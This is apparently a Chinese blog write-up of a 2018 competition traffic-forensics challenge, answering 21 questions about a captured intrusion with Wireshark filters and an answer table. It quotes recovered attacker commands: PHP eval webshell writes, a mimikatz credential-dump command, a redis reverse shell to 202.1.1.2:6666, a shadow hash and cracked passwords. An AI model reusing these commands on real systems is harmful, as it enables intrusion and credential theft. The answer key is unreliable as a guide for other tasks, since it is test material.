2018信息安全铁人三项第三赛区数据赛wp(6.1)
2018.6.1信息安全铁人三项赛数据赛
1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列)
2.两台服务器的主机名分别是什么
3.黑客使用了什么工具对服务器1进行的攻击(小写)
4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)
5.黑客向服务器1写入webshell的具体命令是什么(url解码后)
6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔)
7.服务器1安装的修补程序名称
8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠)
9.黑客使用什么命令或文件进行的内网扫描
10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)
11.黑客执行的什么命令将administrator的密码保存到文件中
12.服务器1的系统管理员administrator的密码是什么
13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)
14.服务器1的mysql的root用户的密码是什么
15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径
16.服务器2的web网站后台账号密码(格式:账号/密码)
17.黑客在redis未授权访问中反弹shell的ip和端口是多少
18.黑客拿到root权限后执行的第二条命令是什么
19.服务器2的root用户密码是什么
20.黑客向服务器2写入webshell的命令
21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)
解题步骤:
1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列)
第一个流量包往下翻,你会发现一大堆长串的
这里我使用了过滤条件,更加直观清晰,使用url解码其中一条,看不出来多看几条,你会发现是在进行sql注入
由此确定攻击方IP是202.1.1.2,被攻击方服务器IP是192.168.1.74,但是总共攻击了两个,这个流量包显示只攻击了一个,所以此题推迟
至第十题方可解决
2.两台服务器的主机名分别是什么
如图进行过滤得到phpinfo界面相关流量,返回包里面有界面的相关信息
将此内容另存为html文件
在系统一行得到主机名,服务器2的主机名请查看第16题
3.黑客使用了什么工具对服务器1进行的攻击(小写)
追踪SQL注入流量任意一条的TCP流即可
头部字段标识了工具名及版本,确认使用工具是sqlmap
4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)
头疼了,是盲注,看不到表的信息,继续往后翻,发现大量head请求
与sql注入中间隔了一大堆的发送接收流量,疑似扫描,到这里可以确认是在进行目录扫描
关键字查找,发现login登陆成功,说明账号及密码正确
账号密码以及验证码都在这里
UserName=admin&Password=adminlwphp&Code=WD7x
5.黑客向服务器1写入webshell的具体命令是什么(url解码后)
这里我们倒着找,在最后发现黑客植入了abc.php进行连接
那么我们只需要往前找到什么时候植入的即可
关键字第二下就找到了url解码一看,木马写入了abc.php
完整url:http://202.1.1.1/tmpbjhbf.php?cmd=echo <?php eval($_POST[ge]);?^>>abc.php
6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔)
找呀找啊找命令,海量流量寻觅它
netstat -ano执行后,你将看到一个列表,其中包括:
- 协议(TCP或UDP)
- 本地地址和端口号
- 外部地址和端口号(如果适用)
- 连接状态(例如,LISTENING、ESTABLISHED等)
- 拥有该连接的进程的PID
查看其tcp流
这里我就不知道了,参考合天网安实验室的,人家也是自己找的信息分辨出来的,我只是个菜鸡
7.服务器1安装的修补程序名称
这道题我看了wp才确定,一堆菜刀连接里面有几个关键的,下图全是菜刀连接流量
其中菜刀上传了scan.php扫内网,tunel.nosoket.php作为内网代理,mimi下的mimikatz.exe用来dump服务器1的密码
首先我们要来了解一条命令,systeminfo命令是windows系统中显示系统信息的命令,此命令可以显示出计算机的操作系统的详细配置信息,包括操作系统配置、安全信息、产品 ID 和硬件属性(如 RAM、磁盘空间和网卡)。
我们需要的就是修补程序名称,因此要找到什么时候使用了这条命令
内容经过base64加密,只能一条条查看,而它刚好在上一问的下一个
追踪其tcp流
与上图相对应,找到修补程序名称
8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠)
phpinfo命令的返回包里面提取得到phpinfo页面,DOCUMENT_ROOT代表网站根目录
9.黑客使用什么命令或文件进行的内网扫描
在做第7题注意到了上传scan.php进行扫内网
10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)
找到scan.php相关的菜刀流量
在最开始上传了此php,那么要找到它什么时候调用此php
追踪其tcp流,url解码此行
确认服务器2处于192.168.1.1-192.168.3.255之间,扫描了21,80,8080,8888,1433,3306,6379以上端口,意味着开启端口的ip之一即为服务器2的ip,整理后如下所示:
<br/>Scanning IP 192.168.1.1<br/>
Port: 80 is open<br/>
<br/>Scanning IP 192.168.1.8<br/>
Port: 80 is open<br/>
Port: 3306 is open<br/>
<br/>Scanning IP 192.168.1.33<br/>
17Port: 3306 is open<br/>
<br/>Scanning IP 192.168.1.74<br/>
Port: 80 is open<br/>
Port: 3306 is open<br/>
<br/>Scanning IP 192.168.1.159<br/>
Port: 80 is open<br/>
Port: 8080 is open<br/>
Port: 3306 is open<br/>
<br/>Scanning IP 192.168.1.169<br/>
15
Port: 80 is open<br/>
17
Port: 3306 is open<br/>
21
<br/>Scanning IP 192.168.2.1<br/>
15
Port: 80 is open<br/>
21
<br/>Scanning IP 192.168.2.20<br/>
15
Port: 80 is open<br/>
17
Port: 3306 is open<br/>
22
22
<br/>Scanning IP 192.168.2.66<br/>
15
Port: 80 is open<br/>
17
Port: 3306 is open<br/>
17
Port: 6379 is open<br/>
22
22
<br/>Scanning IP 192.168.2.88<br/>
15
Port: 21 is open<br/>
15
Port: 80 is open<br/>
17
Port: 3306 is open<br/>
22
21
<br/>Scanning IP 192.168.3.1<br/>
15
Port: 80 is open<br/>
<br/>Scanning IP 192.168.3.6<br/>
15
Port: 80 is open<br/>
17
Port: 3306 is open<br/>
21
此数据包看不出别的了,下一个
(ip.src == 192.168.1.74 and http) && !(ip.dst == 202.1.1.2)
如上述进行过滤,此过滤建立在推断上,既然使用了tunel.nosoket.php作为内网代理,那么我将服务器1作为源地址,排除目的地址为黑客的流量,减小范围,猜测剩余流量中与服务器2有关的流量居多
证实了我的猜想,且此ip在扫描中开启了端口,判断此ip为服务器2的ip,开启了80,3306,6379三个端口
11.黑客执行的什么命令将administrator的密码保存到文件中
mimi下的mimikatz.exe用来dump服务器1的密码,因此返回到流量包3里面查看菜刀流量,找到何时执行了此程序
功夫不负有心人,太多了
谁知道还有一部分了
最终答案:
cd /d "C:\WWW\my\mimi"&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit > log.txt&echo [S]&cd&echo [E]
12.服务器1的系统管理员administrator的密码是什么
上一问提示了密码保存到了log.txt,那么找到什么时候查看了它
关键字查找,快速锁定位置,会找到目标附近,查看附近的菜刀流量,会找到下面这一条
查看此tcp流,找到password
13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)
这道题应该问的是内网扫描范围,第十题确认扫描了192.168.1.1-192.168.3.255
14.服务器1的mysql的root用户的密码是什么
直接搜索dbuser找到数据库用户名root,下面便是它的密码,要确认是不是和服务器1的相关流量
也可以通过查找config.php找到此处,mysql相关信息一般都存在config配置文件中
15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径
这道题不太懂什么思路,http貌似找不到什么,看wp也不懂
tcp and !(tcp.port == 80) and !(tcp.port == 443) and !(tcp.stream eq 98) and ip.addr == 202.1.1.2
直接追踪第一条确实直接得到了shell连接后的所有操作信息
使用root查看了cd /var/www/html目录,与其说是敏感文件,不如说是敏感目录,目录文件,没有标准答案我也很迷糊,借鉴的wp没有标注答案,往下翻发现,黑客查看了敏感文件/etc/shadow,并写入了shell:indexs.php,合天网安实验室的文章提供了思路,图片可查看20题
16.服务器2的web网站后台账号密码(格式:账号/密码)
有关服务器2,那就把与它相关的所有流量提取一下,上来先找到了服务器1想查看服务器2的php界面
追踪tcp流,导出返回包,进而得到phpinfo界面
解决第二题
http contains "admin" ||http contains "pass"
在最后一条找到了相关信息
这张图更容易理解因此admin/bab0e4bb1cd7738880b97d0ca3b313f6,root/142a1ca0def80dc0b70042d133cbcae4
解md5后得到admin管理员密码112233.com(这是条付费记录)
17.黑客在redis未授权访问中反弹shell的ip和端口是多少
第二台服务器开了6379端口,即redis服务,黑客应该是通过打redis获取root权限,然后向第二台机子写入的小马
那么既然是打redis,过滤http流量肯定是不行的,所以这里选择过滤tcp,不难找到以下攻击
可见黑客的确反弹了shell,获取了权限,因此确认ip和端口为202.1.1.2/6666
18.黑客拿到root权限后执行的第二条命令是什么
请回头查看第15题的图片,第二条命令是cd /var/www/html
19.服务器2的root用户密码是什么
root:$6$pJIpnrap9xQnDvB/$dGJnXpT1mMIzAD7K0WiE12rKVRgqCleL9u528e/Bgc2AIblZ3I1bDXfkLZhFehU/C3eCt/il35tiQP1DFccVO0:17030:0:99999:7:::
用户名:root
这是条目的第一部分,表示这是root用户的密码信息。
加密密码:$6$pJIpnrap9xQnDvB/$dGJnXpT1mMIzAD7K0WiE12rKVRgqCleL9u528e/Bgc2AIblZ3I1bDXfkLZhFehU/C3eCt/il35tiQP1DFccVO0
这是条目的第二部分,表示root用户的密码。密码是经过哈希算法加密的,这里使用的是SHA-512算法(由$6$指示)。
pJIpnrap9xQnDvB是盐值(salt),用于与密码一起进行哈希运算,以防止彩虹表攻击。
$dGJnXpT1mMIzAD7K0WiE12rKVRgqCleL9u528e/Bgc2AIblZ3I1bDXfkLZhFehU/C3eCt/il35tiQP1DFccVO0是实际的哈希值。
最后修改日期:17030
这是条目的第三部分,表示密码最后一次修改的时间戳(从1970年1月1日起的天数)。
最小修改天数:0
这是条目的第四部分,表示密码修改后的最小天数,即用户必须等待多少天才能再次修改密码。在这里,0表示没有限制。
最大修改天数:99999
这是条目的第五部分,表示密码的最大有效天数。在这里,99999通常表示密码永不过期(或者是一个非常大的数值,以表示实际上的永不过期)。
密码到期警告天数:7
这是条目的第六部分,表示在密码到期前的多少天开始警告用户。在这里,7表示在密码到期前7天开始警告。
密码过期后的宽限天数:空(表示没有宽限期)
这是条目的第七部分,但在您的例子中它是空的,表示密码过期后用户将立即被锁定,无法登录,直到管理员为其设置新密码。
账号失效日期:空(表示账号永不过期)
这是条目的第八部分,但在您的例子中它是空的,表示账号没有失效日期。
保留字段:空
这是条目的第九部分,用于未来的扩展,目前为空。
可惜我不会爆破sha-512,答案参考合天网安实验室的
20.黑客向服务器2写入webshell的命令
还是此tcp流
21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)
关于无偿arp包,其isgratuitous必须为true
故此挨个过滤每个数据包
arp && arp.isgratuitous == true
依次查看,即可得到答案
192.168.3.213
192.168.3.6
192.168.3.19
答案
| 题目 | 流量包序号 | 答案 |
|---|---|---|
| 1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列) | 1、3、4 | 192.168.1.74 192.168.2.66 |
| 2.两台服务器的主机名分别是什么 | 2、6 | TEST-7E28AF8836 cloude |
| 3.黑客使用了什么工具对服务器1进行的攻击(小写) | 1、2 | sqlmap |
| 4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode) | 2 | admin/adminlwphp/WD7x |
| 5.黑客向服务器1写入webshell的具体命令是什么(url解码后) | 2 | echo <?php eval($_POST[ge]);?^>>abc.php |
| 6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔) | 3 | 1025 3306 3389 |
| 7.服务器1安装的修补程序名称 | 3 | Q147222 |
| 8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠) | 3 | C:/WWW/ |
| 9.黑客使用什么命令或文件进行的内网扫描 | 3 | scan.php |
| 10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开) | 3、4 | 80 3306 6379 |
| 11.黑客执行的什么命令将administrator的密码保存到文件中 | 3 | mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit > log.txt&echo [S]&cd&echo [E] |
| 12.服务器1的系统管理员administrator的密码是什么 | 3 | Simplexue123 |
| 13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx) | 3 | 192.168.1.1~192.168.3.255 |
| 14.服务器1的mysql的root用户的密码是什么 | 4 | windpasssql |
| 15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径 | 5 | etc/shadow |
| 16.服务器2的web网站后台账号密码(格式:账号/密码) | 6 | admin/112233.com |
| 17.黑客在redis未授权访问中反弹shell的ip和端口是多少 | 5 | 202.1.1.2/6666 |
| 18.黑客拿到root权限后执行的第二条命令是什么 | 5 | cd /var/www/html |
| 19.服务器2的root用户密码是什么 | 5 | Simplexue123 |
| 20.黑客向服务器2写入webshell的命令 | 5 | echo '<?php eval($_POST[a]);'>indexs.php |
| 21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序) | 1-6 | 192.168.3.213 192.168.3.6 192.168.3.19 |
评价:非常好的一道题,知识漏洞非常多,归类为高级题
本文来自博客园,作者:kriton,转载请注明原文链接:https://www.cnblogs.com/kriton/articles/18607097
浙公网安备 33010602011771号